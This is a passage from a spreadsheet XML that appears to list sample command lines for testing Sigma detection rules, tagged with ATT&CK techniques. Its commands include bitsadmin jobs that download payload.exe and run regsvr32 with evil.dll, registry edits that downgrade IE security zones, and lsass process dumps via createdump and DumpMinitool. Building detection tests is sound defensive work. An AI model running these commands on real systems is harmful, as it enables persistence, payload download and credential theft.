          <t>b9cbbc17-d00d-4e3d-a827-b06d03d2380d</t>
        </is>
      </c>
      <c r="E2380" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe /SetNotifyCmdLine myjob cmd.exe</t>
        </is>
      </c>
      <c r="F2380" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2380" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2380" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2380" s="43" t="n"/>
      <c r="J2380" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2380" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2381" ht="15.75" customHeight="1" s="42">
      <c r="A2381" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2381" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_potential_persistence</t>
        </is>
      </c>
      <c r="C2381" s="43" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS</t>
        </is>
      </c>
      <c r="D2381" s="43" t="inlineStr">
        <is>
          <t>b9cbbc17-d00d-4e3d-a827-b06d03d2380d</t>
        </is>
      </c>
      <c r="E2381" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe /AddFile myjob https://example.com/payload.exe C:\Temp\payload.exe</t>
        </is>
      </c>
      <c r="F2381" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2381" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2381" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2381" s="43" t="n"/>
      <c r="J2381" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2381" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2382" ht="15.75" customHeight="1" s="42">
      <c r="A2382" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2382" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_potential_persistence</t>
        </is>
      </c>
      <c r="C2382" s="43" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS</t>
        </is>
      </c>
      <c r="D2382" s="43" t="inlineStr">
        <is>
          <t>b9cbbc17-d00d-4e3d-a827-b06d03d2380d</t>
        </is>
      </c>
      <c r="E2382" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe /AddFile myjob ftp://example.com/payload.exe C:\Temp\payload.exe</t>
        </is>
      </c>
      <c r="F2382" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2382" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2382" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2382" s="43" t="n"/>
      <c r="J2382" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2382" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2383" ht="15.75" customHeight="1" s="42">
      <c r="A2383" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2383" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_potential_persistence</t>
        </is>
      </c>
      <c r="C2383" s="43" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS</t>
        </is>
      </c>
      <c r="D2383" s="43" t="inlineStr">
        <is>
          <t>b9cbbc17-d00d-4e3d-a827-b06d03d2380d</t>
        </is>
      </c>
      <c r="E2383" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe /AddFile myjob ftps://example.com/payload.exe C:\Temp\payload.exe</t>
        </is>
      </c>
      <c r="F2383" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2383" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2383" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2383" s="43" t="n"/>
      <c r="J2383" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2383" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2384" ht="15.75" customHeight="1" s="42">
      <c r="A2384" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2384" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_potential_persistence</t>
        </is>
      </c>
      <c r="C2384" s="43" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS</t>
        </is>
      </c>
      <c r="D2384" s="43" t="inlineStr">
        <is>
          <t>b9cbbc17-d00d-4e3d-a827-b06d03d2380d</t>
        </is>
      </c>
      <c r="E2384" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe /SetNotifyCmdLine myjob %COMSPEC% /c echo Test</t>
        </is>
      </c>
      <c r="F2384" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2384" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2384" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2384" s="43" t="n"/>
      <c r="J2384" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2384" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2385" ht="15.75" customHeight="1" s="42">
      <c r="A2385" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2385" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_potential_persistence</t>
        </is>
      </c>
      <c r="C2385" s="43" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS</t>
        </is>
      </c>
      <c r="D2385" s="43" t="inlineStr">
        <is>
          <t>b9cbbc17-d00d-4e3d-a827-b06d03d2380d</t>
        </is>
      </c>
      <c r="E2385" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe /SetNotifyCmdLine myjob regsvr32.exe /s /n /u /i:evil.dll scrobj.dll</t>
        </is>
      </c>
      <c r="F2385" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2385" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2385" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2385" s="43" t="n"/>
      <c r="J2385" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2385" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2386" ht="15.75" customHeight="1" s="42">
      <c r="A2386" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B2386" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C2386" s="43" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D2386" s="43" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E2386" s="43" t="inlineStr">
        <is>
          <t>PrintBrm.exe -b -f C:\Users\Public\data.zip</t>
        </is>
      </c>
      <c r="F2386" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2386" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2386" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2386" s="43" t="n"/>
      <c r="J2386" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2386" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2387" ht="15.75" customHeight="1" s="42">
      <c r="A2387" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B2387" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade</t>
        </is>
      </c>
      <c r="C2387" s="43" t="inlineStr">
        <is>
          <t>IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI</t>
        </is>
      </c>
      <c r="D2387" s="43" t="inlineStr">
        <is>
          <t>10344bb3-7f65-46c2-b915-2d00d47be5b0</t>
        </is>
      </c>
      <c r="E2387" s="43" t="inlineStr">
        <is>
          <t>reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v http /t REG_DWORD /d 0 /F &amp; reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v https /t REG_DWORD /d 0 /F</t>
        </is>
      </c>
      <c r="F2387" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2387" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2387" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2387" s="43" t="n"/>
      <c r="J2387" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2387" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2388" ht="15.75" customHeight="1" s="42">
      <c r="A2388" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B2388" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade</t>
        </is>
      </c>
      <c r="C2388" s="43" t="inlineStr">
        <is>
          <t>IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI</t>
        </is>
      </c>
      <c r="D2388" s="43" t="inlineStr">
        <is>
          <t>10344bb3-7f65-46c2-b915-2d00d47be5b0</t>
        </is>
      </c>
      <c r="E2388" s="43" t="inlineStr">
        <is>
          <t>reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults /v http /t REG_DWORD /d 0 /F &amp; reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults /v https /t REG_DWORD /d 0 /F</t>
        </is>
      </c>
      <c r="F2388" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2388" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2388" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2388" s="43" t="n"/>
      <c r="J2388" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2388" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2389" ht="15.75" customHeight="1" s="42">
      <c r="A2389" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B2389" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade</t>
        </is>
      </c>
      <c r="C2389" s="43" t="inlineStr">
        <is>
          <t>IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI</t>
        </is>
      </c>
      <c r="D2389" s="43" t="inlineStr">
        <is>
          <t>10344bb3-7f65-46c2-b915-2d00d47be5b0</t>
        </is>
      </c>
      <c r="E2389" s="43" t="inlineStr">
        <is>
          <t>reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v http /t REG_DWORD /d 0 /F &amp;&amp; reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v https /t REG_DWORD /d 0 /F</t>
        </is>
      </c>
      <c r="F2389" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2389" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2389" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2389" s="43" t="n"/>
      <c r="J2389" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2389" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2390" ht="15.75" customHeight="1" s="42">
      <c r="A2390" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2390" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C2390" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D2390" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E2390" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F2390" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2390" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2390" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2390" s="43" t="n"/>
      <c r="J2390" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2390" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2391" ht="15.75" customHeight="1" s="42">
      <c r="A2391" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2391" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C2391" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D2391" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E2391" s="43" t="inlineStr">
        <is>
          <t>calc.exe /?</t>
        </is>
      </c>
      <c r="F2391" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2391" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2391" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2391" s="43" t="n"/>
      <c r="J2391" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2391" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2392" ht="15.75" customHeight="1" s="42">
      <c r="A2392" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2392" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C2392" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D2392" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E2392" s="43" t="inlineStr">
        <is>
          <t>calc.exe -h</t>
        </is>
      </c>
      <c r="F2392" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2392" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2392" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2392" s="43" t="n"/>
      <c r="J2392" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2392" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2393" ht="15.75" customHeight="1" s="42">
      <c r="A2393" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2393" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C2393" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D2393" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E2393" s="43" t="inlineStr">
        <is>
          <t>calc.exe /h</t>
        </is>
      </c>
      <c r="F2393" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2393" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2393" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2393" s="43" t="n"/>
      <c r="J2393" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2393" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2394" ht="15.75" customHeight="1" s="42">
      <c r="A2394" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2394" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C2394" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D2394" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E2394" s="43" t="inlineStr">
        <is>
          <t>calc.exe --help</t>
        </is>
      </c>
      <c r="F2394" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2394" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2394" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2394" s="43" t="n"/>
      <c r="J2394" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2394" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2395" ht="15.75" customHeight="1" s="42">
      <c r="A2395" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2395" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C2395" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D2395" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E2395" s="43" t="inlineStr">
        <is>
          <t>calc.exe /v</t>
        </is>
      </c>
      <c r="F2395" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2395" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2395" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2395" s="43" t="n"/>
      <c r="J2395" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2395" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2396" ht="15.75" customHeight="1" s="42">
      <c r="A2396" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2396" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C2396" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D2396" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E2396" s="43" t="inlineStr">
        <is>
          <t>calc.exe --version</t>
        </is>
      </c>
      <c r="F2396" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2396" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2396" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2396" s="43" t="n"/>
      <c r="J2396" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2396" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2397" ht="15.75" customHeight="1" s="42">
      <c r="A2397" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2397" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_switch</t>
        </is>
      </c>
      <c r="C2397" s="43" t="inlineStr">
        <is>
          <t>Suspicious CodePage Switch Via CHCP</t>
        </is>
      </c>
      <c r="D2397" s="43" t="inlineStr">
        <is>
          <t>c7942406-33dd-4377-a564-0f62db0593a3</t>
        </is>
      </c>
      <c r="E2397" s="43" t="inlineStr">
        <is>
          <t>"chcp" 936</t>
        </is>
      </c>
      <c r="F2397" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2397" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2397" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2397" s="43" t="n"/>
      <c r="J2397" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2397" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2398" ht="15.75" customHeight="1" s="42">
      <c r="A2398" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2398" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C2398" s="43" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D2398" s="43" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E2398" s="43" t="inlineStr">
        <is>
          <t>"C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.0.17\\createdump.exe" -u -f C:\\Users\\thaim\\AppData\\Local\\Temp\\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F2398" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2398" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2398" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2398" s="43" t="n"/>
      <c r="J2398" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2398" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2399" ht="15.75" customHeight="1" s="42">
      <c r="A2399" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2399" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_execution</t>
        </is>
      </c>
      <c r="C2399" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D2399" s="43" t="inlineStr">
        <is>
          <t>dee0a7a3-f200-4112-a99b-952196d81e42</t>
        </is>
      </c>
      <c r="E2399" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe 712 C:\temp\dump.dmp Fu"ll</t>
        </is>
      </c>
      <c r="F2399" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2399" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2399" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2399" s="43" t="n"/>
      <c r="J2399" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2399" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2400" ht="15.75" customHeight="1" s="42">
      <c r="A2400" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2400" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C2400" s="43" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D2400" s="43" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E2400" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe --file C:\Temp\memory.dmp -processId 752 -dumpType Full</t>
        </is>
      </c>
      <c r="F2400" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2400" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2400" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2400" s="43" t="n"/>
      <c r="J2400" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2400" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2401" ht="15.75" customHeight="1" s="42">
      <c r="A2401" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2401" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C2401" s="43" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D2401" s="43" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E2401" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe -file C:\Temp\memory.dmp --processId 752 --dumpType Full</t>
        </is>
      </c>
      <c r="F2401" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2401" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2401" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2401" s="43" t="n"/>
      <c r="J2401" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2401" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2402" ht="15.75" customHeight="1" s="42">
      <c r="A2402" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2402" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C2402" s="43" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D2402" s="43" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E2402" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe --file C:\Temp\memory.dmp --processId=752 --dumpType=Full</t>
        </is>
      </c>
      <c r="F2402" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2402" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2402" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2402" s="43" t="n"/>
      <c r="J2402" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2402" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2403" ht="15.75" customHeight="1" s="42">
      <c r="A2403" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2403" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C2403" s="43" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D2403" s="43" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E2403" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe --file C:\Temp\memory.dmp --processId 752 --dumpType Full .txt</t>
        </is>
      </c>
      <c r="F2403" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2403" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2403" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2403" s="43" t="n"/>
      <c r="J2403" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2403" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2404" ht="15.75" customHeight="1" s="42">
      <c r="A2404" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2404" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C2404" s="43" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D2404" s="43" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E2404" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe --file C:\Temp\memory.dmp --processId 752 --dumpType Full --</t>
        </is>
      </c>
      <c r="F2404" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2404" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2404" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2404" s="43" t="n"/>
      <c r="J2404" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2404" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2405" ht="15.75" customHeight="1" s="42">
      <c r="A2405" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2405" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C2405" s="43" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D2405" s="43" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E2405" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe --file C:\Temp\memory.dmp --processId 752 --dumpType Full\</t>
        </is>
      </c>
      <c r="F2405" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2405" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2405" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2405" s="43" t="n"/>
      <c r="J2405" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2405" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2406" ht="15.75" customHeight="1" s="42">
      <c r="A2406" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2406" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C2406" s="43" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D2406" s="43" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E2406" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe --file C:\Temp\memory.dmp --processId 752 --dumpType Full""</t>
        </is>
      </c>
      <c r="F2406" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2406" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2406" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2406" s="43" t="n"/>
      <c r="J2406" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2406" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2407" ht="15.75" customHeight="1" s="42">
      <c r="A2407" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2407" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_break_process_tree</t>
        </is>
      </c>
      <c r="C2407" s="43" t="inlineStr">
        <is>
          <t>Explorer Process Tree Break</t>
        </is>
      </c>
      <c r="D2407" s="43" t="inlineStr">
        <is>
          <t>949f1ffb-6e85-4f00-ae1e-c3c5b190d605</t>
        </is>
      </c>
      <c r="E2407" s="43" t="inlineStr">
        <is>
          <t>explorer.exe /root,calc.exe</t>
        </is>
      </c>
      <c r="F2407" s="43" t="b">
        <v>0</v>
      </c>
